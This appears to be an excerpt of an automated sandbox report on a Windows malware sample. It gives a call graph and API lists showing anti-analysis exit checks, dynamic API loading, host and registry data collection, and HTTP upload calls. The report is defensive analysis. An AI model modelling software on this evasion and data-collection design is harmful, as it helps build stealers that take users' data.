calls 13168->13169 13170 8249a 13169->13170 13171 845c0 2 API calls 13170->13171 13172 824b3 13171->13172 13173 845c0 2 API calls 13172->13173 13174 824cc 13173->13174 13175 845c0 2 API calls 13174->13175 13176 824e5 13175->13176 13177 845c0 2 API calls 13176->13177 13178 824fe 13177->13178 13179 845c0 2 API calls 13178->13179 13180 82517 13179->13180 13181 845c0 2 API calls 13180->13181 13182 82530 13181->13182 13183 845c0 2 API calls 13182->13183 13184 82549 13183->13184 13185 845c0 2 API calls 13184->13185 13186 82562 13185->13186 13187 845c0 2 API calls 13186->13187 13188 8257b 13187->13188 13189 845c0 2 API calls 13188->13189 13190 82594 13189->13190 13191 845c0 2 API calls 13190->13191 13192 825ad 13191->13192 13193 845c0 2 API calls 13192->13193 13194 825c6 13193->13194 13195 845c0 2 API calls 13194->13195 13196 825df 13195->13196 13197 845c0 2 API calls 13196->13197 13198 825f8 13197->13198 13199 845c0 2 API calls 13198->13199 13200 82611 13199->13200 13201 845c0 2 API calls 13200->13201 13202 8262a 13201->13202 13203 845c0 2 API calls 13202->13203 13204 82643 13203->13204 13205 845c0 2 API calls 13204->13205 13206 8265c 13205->13206 13207 845c0 2 API calls 13206->13207 13208 82675 13207->13208 13209 845c0 2 API calls 13208->13209 13210 8268e 13209->13210 13211 99860 13210->13211 13482 99750 GetPEB 13211->13482 13213 99868 13214 99a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13213->13214 13217 9987a 13213->13217 13215 99b0d 13214->13215 13216 99af4 GetProcAddress 13214->13216 13219 99b46 13215->13219 13220 99b16 GetProcAddress GetProcAddress 13215->13220 13216->13215 13218 9988c 21 API calls 13217->13218 13218->13214 13221 99b68 13219->13221 13222 99b4f GetProcAddress 13219->13222 13220->13219 13223 99b89 13221->13223 13224 99b71 GetProcAddress 13221->13224 13222->13221 13225 96a00 13223->13225 13226 99b92 GetProcAddress GetProcAddress 13223->13226 13224->13223 13227 9a740 13225->13227 13226->13225 13228 9a750 13227->13228 13229 
96a0d 13228->13229 13230 9a77e lstrcpy 13228->13230 13231 811d0 13229->13231 13230->13229 13232 811e8 13231->13232 13233 8120f ExitProcess 13232->13233 13234 81217 13232->13234 13235 81160 GetSystemInfo 13234->13235 13236 8117c ExitProcess 13235->13236 13237 81184 13235->13237 13238 81110 GetCurrentProcess VirtualAllocExNuma 13237->13238 13239 81149 13238->13239 13240 81141 ExitProcess 13238->13240 13483 810a0 VirtualAlloc 13239->13483 13243 81220 13487 989b0 13243->13487 13246 8129a 13249 96770 GetUserDefaultLangID 13246->13249 13247 81249 __aulldiv 13247->13246 13248 81292 ExitProcess 13247->13248 13250 967d3 13249->13250 13251 96792 13249->13251 13257 81190 13250->13257 13251->13250 13252 967cb ExitProcess 13251->13252 13253 967ad ExitProcess 13251->13253 13254 967c1 ExitProcess 13251->13254 13255 967a3 ExitProcess 13251->13255 13256 967b7 ExitProcess 13251->13256 13258 978e0 3 API calls 13257->13258 13259 8119e 13258->13259 13260 811cc 13259->13260 13261 97850 3 API calls 13259->13261 13264 97850 GetProcessHeap RtlAllocateHeap GetUserNameA 13260->13264 13262 811b7 13261->13262 13262->13260 13263 811c4 ExitProcess 13262->13263 13265 96a30 13264->13265 13266 978e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13265->13266 13267 96a43 13266->13267 13268 9a9b0 13267->13268 13489 9a710 13268->13489 13270 9a9c1 lstrlen 13273 9a9e0 13270->13273 13271 9aa18 13490 9a7a0 13271->13490 13273->13271 13275 9a9fa lstrcpy lstrcat 13273->13275 13274 9aa24 13274->13103 13275->13271 13277 9a8bb 13276->13277 13278 9a90b 13277->13278 13279 9a8f9 lstrcpy 13277->13279 13278->13114 13279->13278 13494 96820 13280->13494 13282 9698e 13283 96998 sscanf 13282->13283 13523 9a800 13283->13523 13285 969aa SystemTimeToFileTime SystemTimeToFileTime 13286 969ce 13285->13286 13287 969e0 13285->13287 13286->13287 13288 969d8 ExitProcess 13286->13288 13289 95b10 13287->13289 13290 95b1d 13289->13290 13291 9a740 lstrcpy 13290->13291 13292 95b2e 13291->13292 13525 9a820 lstrlen 13292->13525 13295 
9a820 2 API calls 13296 95b64 13295->13296 13297 9a820 2 API calls 13296->13297 13298 95b74 13297->13298 13529 96430 13298->13529 13301 9a820 2 API calls 13302 95b93 13301->13302 13303 9a820 2 API calls 13302->13303 13304 95ba0 13303->13304 13305 9a820 2 API calls 13304->13305 13306 95bad 13305->13306 13307 9a820 2 API calls 13306->13307 13308 95bf9 13307->13308 13538 826a0 13308->13538 13316 95cc3 13317 96430 lstrcpy 13316->13317 13318 95cd5 13317->13318 13319 9a7a0 lstrcpy 13318->13319 13320 95cf2 13319->13320 13321 9a9b0 4 API calls 13320->13321 13322 95d0a 13321->13322 13323 9a8a0 lstrcpy 13322->13323 13324 95d16 13323->13324 13325 9a9b0 4 API calls 13324->13325 13326 95d3a 13325->13326 13327 9a8a0 lstrcpy 13326->13327 13328 95d46 13327->13328 13329 9a9b0 4 API calls 13328->13329 13330 95d6a 13329->13330 13331 9a8a0 lstrcpy 13330->13331 13332 95d76 13331->13332 13333 9a740 lstrcpy 13332->13333 13334 95d9e 13333->13334 14264 97500 GetWindowsDirectoryA 13334->14264 13337 9a7a0 lstrcpy 13338 95db8 13337->13338 14274 84880 13338->14274 13340 95dbe 14419 917a0 13340->14419 13342 95dc6 13343 9a740 lstrcpy 13342->13343 13344 95de9 13343->13344 13345 81590 lstrcpy 13344->13345 13346 95dfd 13345->13346 14435 85960 13346->14435 13348 95e03 14579 91050 13348->14579 13350 95e0e 13351 9a740 lstrcpy 13350->13351 13352 95e32 13351->13352 13353 81590 lstrcpy 13352->13353 13354 95e46 13353->13354 13355 85960 34 API calls 13354->13355 13356 95e4c 13355->13356 14583 90d90 13356->14583 13358 95e57 13359 9a740 lstrcpy 13358->13359 13360 95e79 13359->13360 13361 81590 lstrcpy 13360->13361 13362 95e8d 13361->13362 13363 85960 34 API calls 13362->13363 13364 95e93 13363->13364 14590 90f40 13364->14590 13366 95e9e 13367 81590 lstrcpy 13366->13367 13368 95eb5 13367->13368 14595 91a10 13368->14595 13370 95eba 13371 9a740 lstrcpy 13370->13371 13372 95ed6 13371->13372 14939 84fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13372->14939 13374 95edb 13375 81590 lstrcpy 13374->13375 13376 
95f5b 13375->13376 14946 90740 13376->14946 13378 95f60 13379 9a740 lstrcpy 13378->13379 13380 95f86 13379->13380 13381 81590 lstrcpy 13380->13381 13382 95f9a 13381->13382 13383 85960 34 API calls 13382->13383 13384 95fa0 13383->13384 13478 845d1 RtlAllocateHeap 13477->13478 13481 84621 VirtualProtect 13478->13481 13481->13126 13482->13213 13485 810c2 ctype 13483->13485 13484 810fd 13484->13243 13485->13484 13486 810e2 VirtualFree 13485->13486 13486->13484 13488 81233 GlobalMemoryStatusEx 13487->13488 13488->13247 13489->13270 13491 9a7c2 13490->13491 13492 9a7ec 13491->13492 13493 9a7da lstrcpy 13491->13493 13492->13274 13493->13492 13495 9a740 lstrcpy 13494->13495 13496 96833 13495->13496 13497 9a9b0 4 API calls 13496->13497 13498 96845 13497->13498 13499 9a8a0 lstrcpy 13498->13499 13500 9684e 13499->13500 13501 9a9b0 4 API calls 13500->13501 13502 96867 13501->13502 13503 9a8a0 lstrcpy 13502->13503 13504 96870 13503->13504 13505 9a9b0 4 API calls 13504->13505 13506 9688a 13505->13506 13507 9a8a0 lstrcpy 13506->13507 13508 96893 13507->13508 13509 9a9b0 4 API calls 13508->13509 13510 968ac 13509->13510 13511 9a8a0 lstrcpy 13510->13511 13512 968b5 13511->13512 13513 9a9b0 4 API calls 13512->13513 13514 968cf 13513->13514 13515 9a8a0 lstrcpy 13514->13515 13516 968d8 13515->13516 13517 9a9b0 4 API calls 13516->13517 13518 968f3 13517->13518 13519 9a8a0 lstrcpy 13518->13519 13520 968fc 13519->13520 13521 9a7a0 lstrcpy 13520->13521 13522 96910 13521->13522 13522->13282 13524 9a812 13523->13524 13524->13285 13527 9a83f 13525->13527 13526 95b54 13526->13295 13527->13526 13528 9a87b lstrcpy 13527->13528 13528->13526 13530 9a8a0 lstrcpy 13529->13530 13531 96443 13530->13531 13532 9a8a0 lstrcpy 13531->13532 13533 96455 13532->13533 13534 9a8a0 lstrcpy 13533->13534 13535 96467 13534->13535 13536 9a8a0 lstrcpy 13535->13536 13537 95b86 13536->13537 13537->13301 13539 845c0 2 API calls 13538->13539 13540 826b4 13539->13540 13541 845c0 2 API calls 13540->13541 13542 826d7 
15434 98320 14892->15434 14894 924d3 14895 9a920 3 API calls 14894->14895 14896 924e6 14895->14896 14897 9a8a0 lstrcpy 14896->14897 14898 924ef 14897->14898 14899 9a9b0 4 API calls 14898->14899 14900 92519 14899->14900 14901 9a8a0 lstrcpy 14900->14901 14902 92522 14901->14902 14903 9a9b0 4 API calls 14902->14903 14904 92543 14903->14904 14905 9a8a0 lstrcpy 14904->14905 14906 9254c 14905->14906 14907 98320 17 API calls 14906->14907 14908 92568 14907->14908 14909 9a920 3 API calls 14908->14909 14910 9257b 14909->14910 14911 9a8a0 lstrcpy 14910->14911 14912 92584 14911->14912 14913 9a9b0 4 API calls 14912->14913 14914 925ae 14913->14914 14915 9a8a0 lstrcpy 14914->14915 14916 925b7 14915->14916 14917 9a9b0 4 API calls 14916->14917 14918 925d6 14917->14918 14919 9a8a0 lstrcpy 14918->14919 14920 925df 14919->14920 14921 9a9b0 4 API calls 14920->14921 14922 92600 14921->14922 14923 9a8a0 lstrcpy 14922->14923 14924 92609 14923->14924 15470 98680 14924->15470 14926 92620 14927 9a920 3 API calls 14926->14927 14928 92633 14927->14928 14929 9a8a0 lstrcpy 14928->14929 14930 9263c 14929->14930 14931 9265a lstrlen 14930->14931 14932 9266a 14931->14932 14933 9a740 lstrcpy 14932->14933 14934 9267c 14933->14934 14935 81590 lstrcpy 14934->14935 14936 9268d 14935->14936 15480 95190 14936->15480 14938 92699 14938->13370 15668 9aad0 14939->15668 14941 85009 InternetOpenUrlA 14945 85021 14941->14945 14942 8502a InternetReadFile 14942->14945 14943 850a0 InternetCloseHandle InternetCloseHandle 14944 850ec 14943->14944 14944->13374 14945->14942 14945->14943 15669 898d0 14946->15669 14948 90759 14949 90a38 14948->14949 14950 9077d 14948->14950 14951 81590 lstrcpy 14949->14951 14953 90799 StrCmpCA 14950->14953 14952 90a49 14951->14952 15845 90250 14952->15845 14955 90843 14953->14955 14956 907a8 14953->14956 14959 90865 StrCmpCA 14955->14959 14958 9a7a0 lstrcpy 14956->14958 14960 907c3 14958->14960 14962 90874 14959->14962 14998 9096b 14959->14998 14961 81590 lstrcpy 14960->14961 14963 9080c 
14961->14963 14964 9a740 lstrcpy 14962->14964 14965 9a7a0 lstrcpy 14963->14965 14967 90881 14964->14967 14968 90823 14965->14968 14966 9099c StrCmpCA 14969 909ab 14966->14969 14970 90a2d 14966->14970 14971 9a9b0 4 API calls 14967->14971 14972 9a7a0 lstrcpy 14968->14972 14973 81590 lstrcpy 14969->14973 14970->13378 14974 908ac 14971->14974 14976 9083e 14972->14976 14977 909f4 14973->14977 14975 9a920 3 API calls 14974->14975 14978 908b3 14975->14978 15672 8fb00 14976->15672 14980 9a7a0 lstrcpy 14977->14980 14982 9a9b0 4 API calls 14978->14982 14981 90a0d 14980->14981 14983 9a7a0 lstrcpy 14981->14983 14984 908ba 14982->14984 14985 90a28 14983->14985 14986 9a8a0 lstrcpy 14984->14986 15788 90030 14985->15788 14998->14966 15320 9a7a0 lstrcpy 15319->15320 15321 81683 15320->15321 15322 9a7a0 lstrcpy 15321->15322 15323 81695 15322->15323 15324 9a7a0 lstrcpy 15323->15324 15325 816a7 15324->15325 15326 9a7a0 lstrcpy 15325->15326 15327 815a3 15326->15327 15327->14201 15329 847c6 15328->15329 15330 84838 lstrlen 15329->15330 15354 9aad0 15330->15354 15332 84848 InternetCrackUrlA 15333 84867 15332->15333 15333->14278 15335 9a740 lstrcpy 15334->15335 15336 98b74 15335->15336 15337 9a740 lstrcpy 15336->15337 15338 98b82 GetSystemTime 15337->15338 15340 98b99 15338->15340 15339 9a7a0 lstrcpy 15341 98bfc 15339->15341 15340->15339 15341->14293 15343 9a931 15342->15343 15344 9a988 15343->15344 15347 9a968 lstrcpy lstrcat 15343->15347 15345 9a7a0 lstrcpy 15344->15345 15346 9a994 15345->15346 15346->14297 15347->15344 15348->14411 15350 89af9 LocalAlloc 15349->15350 15351 84eee 15349->15351 15350->15351 15352 89b14 CryptStringToBinaryA 15350->15352 15351->14299 15351->14302 15352->15351 15353 89b39 LocalFree 15352->15353 15353->15351 15354->15332 15355->14421 15356->14562 15357->14564 15358->14572 15487 977a0 15359->15487 15362 91c1e 15362->14654 15363 976c6 RegOpenKeyExA 15364 97704 RegCloseKey 15363->15364 15365 976e7 RegQueryValueExA 15363->15365 15364->15362 15365->15364 15367 
91c99 15366->15367 15367->14668 15369 91e09 15368->15369 15369->14710 15371 97a9a wsprintfA 15370->15371 15372 91e84 15370->15372 15371->15372 15372->14724 15374 97b4d 15373->15374 15375 91efe 15373->15375 15494 98d20 LocalAlloc CharToOemW 15374->15494 15375->14738 15378 9a740 lstrcpy 15377->15378 15379 97bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15378->15379 15386 97c25 15379->15386 15380 97d18 15382 97d28 15380->15382 15383 97d1e LocalFree 15380->15383 15381 97c46 GetLocaleInfoA 15381->15386 15385 9a7a0 lstrcpy 15382->15385 15383->15382 15384 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15384->15386 15388 97d37 15385->15388 15386->15380 15386->15381 15386->15384 15387 9a8a0 lstrcpy 15386->15387 15387->15386 15388->14751 15390 92008 15389->15390 15390->14766 15392 99493 GetModuleFileNameExA CloseHandle 15391->15392 15393 994b5 15391->15393 15392->15393 15394 9a740 lstrcpy 15393->15394 15395 92091 15394->15395 15395->14781 15397 97e68 RegQueryValueExA 15396->15397 15398 92119 15396->15398 15399 97e8e RegCloseKey 15397->15399 15398->14795 15399->15398 15401 97fb9 GetLogicalProcessorInformationEx 15400->15401 15402 98029 15401->15402 15403 97fd8 GetLastError 15401->15403 15407 989f0 2 API calls 15402->15407 15411 98022 15403->15411 15412 97fe3 15403->15412 15405 92194 15405->14809 15409 9807b 15407->15409 15408 989f0 2 API calls 15408->15405 15410 98084 wsprintfA 15409->15410 15409->15411 15410->15405 15411->15405 15411->15408 15412->15401 15412->15405 15495 989f0 15412->15495 15498 98a10 GetProcessHeap RtlAllocateHeap 15412->15498 15414 9220f 15413->15414 15414->14823 15416 989b0 15415->15416 15417 9814d GlobalMemoryStatusEx 15416->15417 15420 98163 __aulldiv 15417->15420 15418 9819b wsprintfA 15419 92289 15418->15419 15419->14837 15420->15418 15422 987fb GetProcessHeap RtlAllocateHeap wsprintfA 15421->15422 15424 9a740 lstrcpy 15422->15424 15425 9230b 15424->15425 15425->14851 15427 9a740 lstrcpy 15426->15427 15433 98229 15427->15433 15428 98263 15430 
9a7a0 lstrcpy 15428->15430 15429 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15429->15433 15431 982dc 15430->15431 15431->14868 15432 9a8a0 lstrcpy 15432->15433 15433->15428 15433->15429 15433->15432 15435 9a740 lstrcpy 15434->15435 15436 9835c RegOpenKeyExA 15435->15436 15437 983ae 15436->15437 15438 983d0 15436->15438 15439 9a7a0 lstrcpy 15437->15439 15440 983f8 RegEnumKeyExA 15438->15440 15441 98613 RegCloseKey 15438->15441 15450 983bd 15439->15450 15442 9843f wsprintfA RegOpenKeyExA 15440->15442 15443 9860e 15440->15443 15444 9a7a0 lstrcpy 15441->15444 15445 984c1 RegQueryValueExA 15442->15445 15446 98485 RegCloseKey RegCloseKey 15442->15446 15443->15441 15444->15450 15448 984fa lstrlen 15445->15448 15449 98601 RegCloseKey 15445->15449 15447 9a7a0 lstrcpy 15446->15447 15447->15450 15448->15449 15451 98510 15448->15451 15449->15443 15450->14894 15452 9a9b0 4 API calls 15451->15452 15453 98527 15452->15453 15454 9a8a0 lstrcpy 15453->15454 15455 98533 15454->15455 15456 9a9b0 4 API calls 15455->15456 15457 98557 15456->15457 15458 9a8a0 lstrcpy 15457->15458 15459 98563 15458->15459 15460 9856e RegQueryValueExA 15459->15460 15460->15449 15461 985a3 15460->15461 15462 9a9b0 4 API calls 15461->15462 15463 985ba 15462->15463 15464 9a8a0 lstrcpy 15463->15464 15465 985c6 15464->15465 15466 9a9b0 4 API calls 15465->15466 15467 985ea 15466->15467 15468 9a8a0 lstrcpy 15467->15468 15469 985f6 15468->15469 15469->15449 15471 9a740 lstrcpy 15470->15471 15472 986bc CreateToolhelp32Snapshot Process32First 15471->15472 15473 986e8 Process32Next 15472->15473 15474 9875d CloseHandle 15472->15474 15473->15474 15479 986fd 15473->15479 15475 9a7a0 lstrcpy 15474->15475 15477 98776 15475->15477 15476 9a8a0 lstrcpy 15476->15479 15477->14926 15478 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15478->15479 15479->15473 15479->15476 15479->15478 15481 9a7a0 lstrcpy 15480->15481 15482 951b5 15481->15482 15483 81590 lstrcpy 15482->15483 15484 951c6 15483->15484 15499 85100 15484->15499 15486 951cf 
15486->14938 15490 97720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15487->15490 15489 976b9 15489->15362 15489->15363 15491 97780 RegCloseKey 15490->15491 15492 97765 RegQueryValueExA 15490->15492 15493 97793 15491->15493 15492->15491 15493->15489 15494->15375 15496 989f9 GetProcessHeap HeapFree 15495->15496 15497 98a0c 15495->15497 15496->15497 15497->15412 15498->15412 15500 9a7a0 lstrcpy 15499->15500 15501 85119 15500->15501 15502 847b0 2 API calls 15501->15502 15503 85125 15502->15503 15659 98ea0 15503->15659 15505 85184 15506 85192 lstrlen 15505->15506 15507 851a5 15506->15507 15508 98ea0 4 API calls 15507->15508 15509 851b6 15508->15509 15510 9a740 lstrcpy 15509->15510 15511 851c9 15510->15511 15512 9a740 lstrcpy 15511->15512 15513 851d6 15512->15513 15514 9a740 lstrcpy 15513->15514 15515 851e3 15514->15515 15516 9a740 lstrcpy 15515->15516 15517 851f0 15516->15517 15518 9a740 lstrcpy 15517->15518 15519 851fd InternetOpenA StrCmpCA 15518->15519 15520 8522f 15519->15520 15521 858c4 InternetCloseHandle 15520->15521 15522 98b60 3 API calls 15520->15522 15530 858d9 ctype 15521->15530 15523 8524e 15522->15523 15524 9a920 3 API calls 15523->15524 15525 85261 15524->15525 15526 9a8a0 lstrcpy 15525->15526 15527 8526a 15526->15527 15528 9a9b0 4 API calls 15527->15528 15529 852ab 15528->15529 15531 9a920 3 API calls 15529->15531 15532 9a7a0 lstrcpy 15530->15532 15533 852b2 15531->15533 15539 85913 15532->15539 15534 9a9b0 4 API calls 15533->15534 15535 852b9 15534->15535 15536 9a8a0 lstrcpy 15535->15536 15537 852c2 15536->15537 15538 9a9b0 4 API calls 15537->15538 15540 85303 15538->15540 15539->15486 15541 9a920 3 API calls 15540->15541 15542 8530a 15541->15542 15543 9a8a0 lstrcpy 15542->15543 15544 85313 15543->15544 15545 85329 InternetConnectA 15544->15545 15545->15521 15546 85359 HttpOpenRequestA 15545->15546 15548 858b7 InternetCloseHandle 15546->15548 15549 853b7 15546->15549 15548->15521 15550 9a9b0 4 API calls 15549->15550 15551 853cb 15550->15551 15552 
9a8a0 lstrcpy 15551->15552 15553 853d4 15552->15553 15554 9a920 3 API calls 15553->15554 15555 853f2 15554->15555 15556 9a8a0 lstrcpy 15555->15556 15557 853fb 15556->15557 15558 9a9b0 4 API calls 15557->15558 15559 8541a 15558->15559 15560 9a8a0 lstrcpy 15559->15560 15561 85423 15560->15561 15562 9a9b0 4 API calls 15561->15562 15563 85444 15562->15563 15564 9a8a0 lstrcpy 15563->15564 15565 8544d 15564->15565 15566 9a9b0 4 API calls 15565->15566 15567 8546e 15566->15567 15660 98ead CryptBinaryToStringA 15659->15660 15662 98ea9 15659->15662 15661 98ece GetProcessHeap RtlAllocateHeap 15660->15661 15660->15662 15661->15662 15663 98ef4 ctype 15661->15663 15662->15505 15664 98f05 CryptBinaryToStringA 15663->15664 15664->15662 15668->14941 15911 89880 15669->15911 15671 898e1 15671->14948 15673 9a740 lstrcpy 15672->15673 15846 9a740 lstrcpy 15845->15846 15847 90266 15846->15847 15848 98de0 2 API calls 15847->15848 15849 9027b 15848->15849 15850 9a920 3 API calls 15849->15850 15851 9028b 15850->15851 15852 9a8a0 lstrcpy 15851->15852 15853 90294 15852->15853 15854 9a9b0 4 API calls 15853->15854 15912 8988e 15911->15912 15915 86fb0 15912->15915 15914 898ad ctype 15914->15671 15918 86d40 15915->15918 15919 86d63 15918->15919 15928 86d59 15918->15928 15934 86530 15919->15934 15923 86dbe 15923->15928 15944 869b0 15923->15944 15925 86e2a 15926 86ee6 VirtualFree 15925->15926 15925->15928 15933 86ef7 15925->15933 15926->15933 15927 86f41 15927->15928 15929 989f0 2 API calls 15927->15929 15928->15914 15929->15928 15930 86f38 15932 989f0 2 API calls 15930->15932 15931 86f26 FreeLibrary 15931->15933 15932->15927 15933->15927 15933->15930 15933->15931 15935 86542 15934->15935 15937 86549 15935->15937 15954 98a10 GetProcessHeap RtlAllocateHeap 15935->15954 15937->15928 15938 86660 15937->15938 15943 8668f VirtualAlloc 15938->15943 15940 86730 15941 8673c 15940->15941 15942 86743 VirtualAlloc 15940->15942 15941->15923 15942->15941 15943->15940 15943->15941 15945 869c9 15944->15945 15949 
869d5 15944->15949 15946 86a09 LoadLibraryA 15945->15946 15945->15949 15947 86a32 15946->15947 15946->15949 15953 86ae0 15947->15953 15955 98a10 GetProcessHeap RtlAllocateHeap 15947->15955 15949->15925 15950 86ba8 GetProcAddress 15950->15949 15950->15953 15951 989f0 2 API calls 15951->15953 15952 86a8b 15952->15949 15952->15951 15953->15949 15953->15950 15954->15937 15955->15952

                                Control-flow Graph
                                APIs
                                • GetProcAddress.KERNEL32(77190000,00D017D0), ref: 000998A1
                                • GetProcAddress.KERNEL32(77190000,00D01650), ref: 000998BA
                                • GetProcAddress.KERNEL32(77190000,00D01770), ref: 000998D2
                                • GetProcAddress.KERNEL32(77190000,00D015A8), ref: 000998EA
                                • GetProcAddress.KERNEL32(77190000,00D016F8), ref: 00099903
                                • GetProcAddress.KERNEL32(77190000,00D08AF0), ref: 0009991B
                                • GetProcAddress.KERNEL32(77190000,00CF4FD0), ref: 00099933
                                • GetProcAddress.KERNEL32(77190000,00CF5110), ref: 0009994C
                                • GetProcAddress.KERNEL32(77190000,00D01788), ref: 00099964
                                • GetProcAddress.KERNEL32(77190000,00D01698), ref: 0009997C
                                • GetProcAddress.KERNEL32(77190000,00D01740), ref: 00099995
                                • GetProcAddress.KERNEL32(77190000,00D016C8), ref: 000999AD
                                • GetProcAddress.KERNEL32(77190000,00CF4F90), ref: 000999C5
                                • GetProcAddress.KERNEL32(77190000,00D016B0), ref: 000999DE
                                • GetProcAddress.KERNEL32(77190000,00D016E0), ref: 000999F6
                                • GetProcAddress.KERNEL32(77190000,00CF5010), ref: 00099A0E
                                • GetProcAddress.KERNEL32(77190000,00D017E8), ref: 00099A27
                                • GetProcAddress.KERNEL32(77190000,00D01500), ref: 00099A3F
                                • GetProcAddress.KERNEL32(77190000,00CF50F0), ref: 00099A57
                                • GetProcAddress.KERNEL32(77190000,00D015D8), ref: 00099A70
                                • GetProcAddress.KERNEL32(77190000,00CF5270), ref: 00099A88
                                • LoadLibraryA.KERNEL32(00D015F0,?,00096A00), ref: 00099A9A
                                • LoadLibraryA.KERNEL32(00D01518,?,00096A00), ref: 00099AAB
                                • LoadLibraryA.KERNEL32(00D01548,?,00096A00), ref: 00099ABD
                                • LoadLibraryA.KERNEL32(00D01590,?,00096A00), ref: 00099ACF
                                • LoadLibraryA.KERNEL32(00D01608,?,00096A00), ref: 00099AE0
                                • GetProcAddress.KERNEL32(76850000,00D01560), ref: 00099B02
                                • GetProcAddress.KERNEL32(77040000,00D01620), ref: 00099B23
                                • GetProcAddress.KERNEL32(77040000,00D01638), ref: 00099B3B
                                • GetProcAddress.KERNEL32(75A10000,00D08F80), ref: 00099B5D
                                • GetProcAddress.KERNEL32(75690000,00CF5130), ref: 00099B7E
                                • GetProcAddress.KERNEL32(776F0000,00D08B20), ref: 00099B9F
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00099BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00099BAA
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                • Instruction ID: 4ae76afd93712e136087656b7b6dff623fc217f17b7484b65a9884ef56c8b408
                                • Opcode Fuzzy Hash: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                • Instruction Fuzzy Hash: 73A1AEB55012889FC344EFA8FD8CE6AB7F9F74C309704861AE60AC7264D7399846CB56

                                Control-flow Graph
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0008460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0008479C
                                Strings
                                 • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845F3, 00084683, 0008471E, 000846CD, 000845E8, 00084622, 000846B7, 0008466D, 00084638, 00084713, 000845D2, 00084662, 000845C7, 00084657, 00084729, 0008473F, 00084734, 00084678, 000846AC, 00084643, 00084770, 00084617, 0008477B, 000845DD, 000846D8, 00084765, 0008462D, 0008474F, 000846C2, 0008475A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
